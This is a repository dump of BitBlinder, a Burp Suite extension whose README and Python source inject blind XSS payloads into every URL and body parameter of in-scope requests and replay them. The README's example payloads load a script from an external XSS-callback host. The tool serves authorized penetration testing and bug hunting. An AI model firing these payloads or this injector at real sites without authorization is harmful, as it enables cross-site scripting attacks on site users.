├── README.md
├── blinder.py
└── lib
    ├── __init__.py
    ├── ui.py
    └── utils.py


/README.md:
--------------------------------------------------------------------------------
 1 | # BitBlinder
 2 | 
 3 | **THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK**  
 4 | Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite
 5 | ```
 6 | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
 7 | -  Developer: Ahmed Ezzat (BitTheByte)      -
 8 | -  Github:    https://github.com/BitTheByte -
 9 | -  Version:   0.05b                         -
10 | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
11 | [WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE
12 | [WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY
13 | [WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH
14 | ```
15 | 
16 | # Configuration
17 | Go to `Bit blinder` tab then enable it  
18 | Set your payloads (line separated)  
19 | ```
20 | "><script%20src="https://myusername.xss.ht"><script>
21 | "><script%20src="https://myusername.xss.ht"><script>
22 | ...
23 | ```
24 | If you added more than 1 payload enable the randomization button  
25 | If you want to keep it disabled keep in mind that the tool will use the first payload only
26 | 
27 | 
28 | # How to use
29 | 1. Load the extension to your burpsuite
30 | 2. Click on `Bit blinder` tab then enable it  
31 | 3. Add your target to scope **It'll only work for inscope items**
32 | 4. Continue your hunting session **Make sure to do alot of actions [Forms,Search,...]**
33 | 5. Monitor the output in extension's output tab
34 | 
35 | **Note:** By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection
36 | 
37 | 
38 | # In a nutshell
39 | 
40 | When user visits [https://example.com?vuln=123&vuln2=abc](https://example.com?vuln=123&vuln2=abc)  
41 | This tool will generate the following 2 requests (in the background without effecting the current session)  
42 | 1. [https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc](https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc)
43 | 2. [https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]](https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD])
44 | 
45 | The previous example also applies to `POST` parameters
46 | 
47 | 
48 | # Current version
49 | ```
50 | Version 0.05b
51 | ```
52 | 
53 | 
54 | # TO-DO (By priority)
55 | - GUI ✓ ( A very ugly one for now.. )
56 | - Fix endless request loops ✓
57 | - Injection in headers
58 | - Option to exclude paramters/hosts/endpoints
59 | - Better output/logging system
60 | 


--------------------------------------------------------------------------------
/blinder.py:
--------------------------------------------------------------------------------
  1 | from burp import IBurpExtender
  2 | from burp import IHttpListener
  3 | from burp import ITab
  4 | from lib.utils import URL
  5 | from lib.ui import GUI
  6 | from random import randint
  7 | import datetime
  8 | import sys
  9 | 
 10 | OP_INJECTION_PARAMS = [
 11 | 	URL.PARAM_URL,
 12 | 	URL.PARAM_BODY
 13 | ]
 14 | 
 15 | OP_DEBUG_MODE = 0
 16 | OP_DEBUG_SERVER = "127.0.0.1"
 17 | OP_DEBUG_PORT = 80
 18 | OP_DEBUG_USE_HTTPS = 0
 19 | OP_SHOW_OUT_OF_SCOPE = 0
 20 | 
 21 | 
 22 | class BurpExtender(IBurpExtender, IHttpListener, ITab):
 23 | 
 24 |     def getTabCaption(self):
 25 |     	# Setting extenstion tab name
 26 |         return "Bit Blinder"
 27 | 
 28 |     def getUiComponent(self):
 29 |     	# Returning instance of the panel as in burp's docs
 30 |         return self.ui.panel
 31 | 
 32 |     def registerExtenderCallbacks(self, callbacks):
 33 | 
 34 |         gui = GUI() # Local instance of the GUI class
 35 |         self.ui = gui.gui()
 36 | 
 37 |         # Registering callbacks from burp api
 38 |         self.callbacks = callbacks
 39 |         self.callbacks.setExtensionName("BIT/Blinder")
 40 |         self.callbacks.registerHttpListener(self)
 41 | 
 42 |         # Redirect the stdout to burp stdout
 43 |         sys.stdout = self.callbacks.getStdout()
 44 |         
 45 |         # Saving IExtensionHelpers to use later
 46 |         self.helpers = self.callbacks.getHelpers()
 47 | 
 48 |         # Settings up the main gui
 49 |         self.callbacks.customizeUiComponent(self.ui.panel)
 50 |         self.callbacks.addSuiteTab(self)
 51 |         print("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*")
 52 |         print("-  Developer: Ahmed Ezzat (BitTheByte)      -")
 53 |         print("-  Github:    https://github.com/BitTheByte -")
 54 |         print("-  Version:   0.05b                         -")
 55 |         print("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*")
 56 |         print("[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE")
 57 |         print("[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY")
 58 |         print("[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH")
 59 |         return
 60 | 
 61 |     def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
 62 | 
 63 |     	# Check if tool is enabled from the gui panel
 64 |         if not self.ui.enable.isSelected(): return
 65 | 
 66 |         # Check if it's not a request from burp
 67 |         if not messageIsRequest: return
 68 | 
 69 |         request = messageInfo.getRequest()
 70 |         requestInfo = self.helpers.analyzeRequest(messageInfo)
 71 |         url = requestInfo.getUrl()
 72 | 
 73 |         # Check if the url in the scope
 74 |         if not self.callbacks.isInScope(url):
 75 |             if OP_SHOW_OUT_OF_SCOPE:
 76 |                 print(f"[-] {url} is out of scope")
 77 |             return
 78 | 
 79 |         https = 1 if 'https' in requestInfo.url.getProtocol() else 0
 80 |         payloads = self.ui.get_payloads()
 81 |         body = request[requestInfo.getBodyOffset():]
 82 |         path = requestInfo.url.getPath()
 83 |         host = requestInfo.url.getHost()
 84 |         port = requestInfo.url.port
 85 |         method = requestInfo.getMethod()
 86 |         headers = requestInfo.getHeaders()
 87 |         paramters = requestInfo.getParameters()
 88 |         vparams = [p for p in paramters if p.getType() in OP_INJECTION_PARAMS]
 89 | 
 90 |         req_time = datetime.datetime.now().strftime('%m/%d|%H:%M:%S')
 91 | 
 92 |         print("====================================================")
 93 |         print(f"[{req_time}] Host: %s" % host)
 94 |         print(f"[{req_time}] Path: %s" % path)
 95 |         print(f"[{req_time}] Port: %i" % port)
 96 |         print(f"[{req_time}] Method: %s" % method)
 97 |         print(f"[{req_time}] Using http: %i" % (not https))
 98 |         print(f"[{req_time}] Injection points: %s" % len(vparams))
 99 |         print("====================================================")
100 | 
101 | 
102 |         new_paramters_value = []
103 | 
104 |         for paramter in vparams:
105 |             name = paramter.getName()
106 |             value = paramter.getValue()
107 |             ptype = paramter.getType()
108 | 
109 |             # To prevent self scanning
110 |             if name == "blinder_ignore_request" and value == "yes": return
111 | 
112 | 
113 |             if self.ui.randomize.isSelected():
114 |                 payload = payloads[randint(0, len(payloads) - 1)]
115 |             else:
116 |                 payload = payloads[0]
117 | 
118 |             # Adding the new paramters to array to use it for later
119 |             new_paramters_value.append(
120 |                 self.helpers.buildParameter(name, payload, ptype)
121 |             )
122 | 
123 | 
124 |         for paramter in new_paramters_value:
125 |             name = paramter.getName()
126 |             value = paramter.getValue()
127 |             ptype = paramter.getType()
128 | 
129 |             updated_request = self.helpers.addParameter(
130 |                 self.helpers.updateParameter(request, paramter),
131 |                 self.helpers.buildParameter("blinder_ignore_request", "yes", 0)
132 |             )
133 | 
134 |             if OP_DEBUG_MODE:
135 |                 self.callbacks.makeHttpRequest(
136 |                     OP_DEBUG_SERVER, OP_DEBUG_PORT,
137 |                     OP_DEBUG_USE_HTTPS, updated_request
138 |                 )
139 |             else:
140 |                 self.callbacks.makeHttpRequest(
141 |                     host, port, https, updated_request
142 |                 )
143 | 
144 |         return
145 | 


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BitTheByte/BitBlinder/b1183cc37ee4ae3f8b432b87494889361d9de89c/lib/__init__.py


--------------------------------------------------------------------------------
/lib/ui.py:
--------------------------------------------------------------------------------
 1 | from java.awt import Component
 2 | from java.awt import FlowLayout
 3 | from java.awt import Panel
 4 | from java.awt.event import ActionEvent
 5 | from java.awt.event import ActionListener
 6 | from javax.swing import JButton
 7 | from javax.swing import JLabel
 8 | from java.awt import BorderLayout
 9 | from javax.swing import JCheckBox
10 | from javax.swing import JTable
11 | from javax.swing import JScrollPane
12 | from javax.swing.table import DefaultTableModel
13 | from javax.swing import JTextArea
14 | from java.io import PrintWriter
15 | from utils import Helpers
16 | 
17 | 
18 | class GUI(Helpers):
19 | 
20 |     def gui(self):
21 | 
22 |         x = 10  # panel padding
23 |         y = 5  # panel padding
24 | 
25 |         self.panel = Panel()
26 |         self.panel.setLayout(None)
27 |         self.scn_lbl = JLabel("Enable scanning")
28 |         self.scn_lbl.setBounds(x, y, 100, 20)
29 |         self.panel.add(self.scn_lbl)
30 |         self.enable = JCheckBox()
31 |         self.enable.setBounds(x + 120, y, 50, 20)
32 |         self.panel.add(self.enable)
33 | 
34 |         self.rand_lbl = JLabel("Randomize payloads")
35 |         self.rand_lbl.setBounds(x, y + 15, 100, 20)
36 |         self.panel.add(self.rand_lbl)
37 |         self.randomize = JCheckBox()
38 |         self.randomize.setBounds(x + 120, y + 15, 50, 20)
39 |         self.panel.add(self.randomize)
40 | 
41 |         self.pyld_lbl = JLabel("Payloads List (Line separated)")
42 |         self.pyld_lbl.setBounds(x, y + 30, 180, 20)
43 |         self.panel.add(self.pyld_lbl)
44 | 
45 |         self.payloads_list = JTextArea()
46 |         self.pyld_scrl = JScrollPane(self.payloads_list)
47 |         self.pyld_scrl.setBounds(x, y + 50, 600, 200)
48 |         self.panel.add(self.pyld_scrl)
49 | 
50 |         self.save_btn = JButton("Save", actionPerformed=self.save_settings)
51 |         self.save_btn.setBounds(x, y + 250, 100, 30)
52 |         self.panel.add(self.save_btn)
53 | 
54 |         # Settings loader from [utils/Helpers/load_settings]
55 |         self.load_settings()
56 |         return self


--------------------------------------------------------------------------------
/lib/utils.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import os
 3 | 
 4 | class URL(object):
 5 |     PARAM_URL = 0
 6 |     PARAM_BODY = 1
 7 |     PARAM_COOKIE = 2
 8 |     PARAM_XML = 3
 9 |     PARAM_XML_ATTR = 4
10 |     PARAM_MULTIPART_ATTR = 5
11 |     PARAM_JSON = 6
12 | 
13 | class Helpers(object):
14 | 
15 |     def get_payloads(self):
16 | 
17 |         return (self.payloads_list.getText().replace(" ","%20")).split("\n")
18 | 
19 |     def save_settings(self, evnt):
20 | 
21 |         config = {
22 |             'Randomize': 0,
23 |             'Payloads': [],
24 |             'isEnabled': self.enable.isSelected(),
25 |         }
26 |         config['Randomize'] = self.randomize.isSelected()
27 | 
28 |         for payload in self.get_payloads():
29 |             config['Payloads'].append(payload)
30 | 
31 |         with open("./config.json", "w") as f:
32 |             f.write(json.dumps(config))
33 |         print("[~] Settings saved")
34 |         return
35 | 
36 |     def load_settings(self):
37 | 
38 |         # Check if there's saved config if true then load it
39 |         if os.path.isfile('./config.json'):
40 | 
41 |             with open("./config.json", "r") as f:
42 |                 config = json.loads(f.read())
43 |             self.enable.setSelected(config['isEnabled'])
44 |             self.randomize.setSelected(config['Randomize'])
45 |             self.payloads_list.setText('\n'.join(config['Payloads']))
46 | 
47 |             print("[~] Settings loaded")
48 | 
49 |         return
50 | 


--------------------------------------------------------------------------------